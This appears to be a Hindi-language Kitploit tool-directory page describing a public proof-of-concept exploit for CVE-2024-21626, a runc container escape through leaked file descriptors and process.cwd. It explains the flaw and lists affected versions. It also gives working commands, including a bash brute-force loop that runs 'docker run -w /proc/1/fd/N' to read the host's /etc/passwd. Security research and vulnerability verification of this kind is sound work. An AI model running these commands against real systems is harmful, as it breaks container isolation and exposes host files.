Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-21626 — CVE-2024-21626 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, लीक फ़ाइल डिस्क्रिप्टर और process.cwd हेरफेर के माध्यम से runc कंटेनर ब्रेकआउट, होस्ट फ़ाइल सिस्टम एक्सेस सक्षम करता है। | Kitploit
उपकरण/GitHubGitHub/cdxiaodong/cve-2024-21626
कंटेनर सुरक्षाभेद्यता विश्लेषणशोषणपेनिट्रेशन टेस्टिंगक्लाउड सुरक्षाकंटेनर एस्केप
GitHubcdxiaodong/cve-2024-21626

CVE-2024-21626

CVE-2024-21626 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, लीक फ़ाइल डिस्क्रिप्टर और process.cwd हेरफेर के माध्यम से runc कंटेनर ब्रेकआउट, होस्ट फ़ाइल सिस्टम एक्सेस सक्षम करता है।

रिपॉजिटरी देखें
5142 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

उपयोग:

  1. git clone https://github.com/cdxiaodong/CVE-2024-21626

  2. docker-compose up

सत्यापन: यदि होस्ट का /etc/passwd प्राप्त हो जाता है, तो यह भेद्यता मौजूद है

वातावरण: runc: >=v1.0.0-rc93,<=1.1.11

हमले के विवरण का सिद्धांत: runc के प्रभावित संस्करणों में, प्रारंभिकरण (initialization) प्रक्रिया के दौरान कुछ आंतरिक फ़ाइल डिस्क्रिप्टर लीक हो जाते हैं, जिनमें होस्ट के /sys/fs/cgroup का हैंडल भी शामिल है। साथ ही, runc यह सत्यापित नहीं करता कि अंतिम कार्यशील निर्देशिका कंटेनर के माउंट नेमस्पेस के भीतर है या नहीं। हमलावर process.cwd को /proc/self/fd/7 पर सेट कर सकता है, या होस्ट पर runc exec कॉल करते समय --cwd पैरामीटर में दिए गए विशिष्ट पथ को /proc/self/fd/7/ सिमलिंक से बदल सकता है, जिससे कंटेनर के अंदर की प्रक्रियाएँ होस्ट के फ़ाइल सिस्टम तक पहुँच और संचालन कर सकती हैं, और इस प्रकार कंटेनर के अलगाव तंत्र को बायपास कर सकती हैं। अधिक विवरण (gif चित्र):

  1. हमलावर हमले के लिए स्व-निर्मित docker-poc पैकेज का उपयोग करता है CVE-2024-21626 runc process.cwd और लीक हुए fds कंटेनर ब्रेकआउट |स्निक (snyk.io)
  2. यह docker-image अभी तक सार्वजनिक रूप से ओपन-सोर्स नहीं है 20240201 img_v3_027l_c9651fc0-e6db-4524-9363-1e12fca4f8dg
  3. आधिकारिक स्रोत कोड संशोधन तर्क: Merge pull request from GHSA-xr7r-f8xq-vfvv · opencontainers/runc@0212048 (github.com)
  4. Runc Process.CWD चाल और लीक हुए FDS के माध्यम से कंटेनर ब्रेकआउट के लिए संवेदनशील ·CVE-2024-21626 ·GitHub सलाह डेटाबेस

CVE: CVE - CVE-2024-21626 (mitre.org) इस भेद्यता का खोजकर्ता: CVE-2024-21626 runc process.cwd और लीक हुए fds कंटेनर ब्रेकआउट |स्निक (snyk.io) image

वास्तविक fd फ़ाइल खोलने के क्रम के अनुसार बदल सकता है; ब्रूट-फोर्स के लिए निम्न स्क्रिप्ट का उपयोग किया जा सकता है

/// #!/bin/bash

for i in {3..10} do # 使用变量构造工作目录,并运行容器 docker run -w /proc/1/fd/$i ubuntu cat ../../../../../etc/passwd done ///

स्थानीय परीक्षण सफल: fd/9 द्वारा कार्यान्वित, runc-version: 1.1.10 1.1.2 image

जब runc --version 1.0.0 है image

जब runc --version 1.1.4 है, fd/8 द्वारा कार्यान्वित image

आज ही खोजी गई भेद्यता नीचे अधिक विवरण दिए गए हैं

इसे निम्न विधियों से दोहराया जा सकता है:

  1. runc - input मैन्युअल ब्रेकपॉइंट कंपाइल
  2. ebpf से runc पर ब्रेकपॉइंट की निगरानी
  3. runc create demo runc exec demo ls /proc/1/fd -a से सीधे संबंधित सिमलिंक देखे जा सकते हैं
  4. docker run -w /proc/1/fd/0-10 ubuntu cat ../../../../../etc/passwd ब्रूट-फोर्स

todo: runc ब्रेकपॉइंट से fd प्राप्त करके स्वचालन आसानी से लागू करना

टूल डाउनलोड करें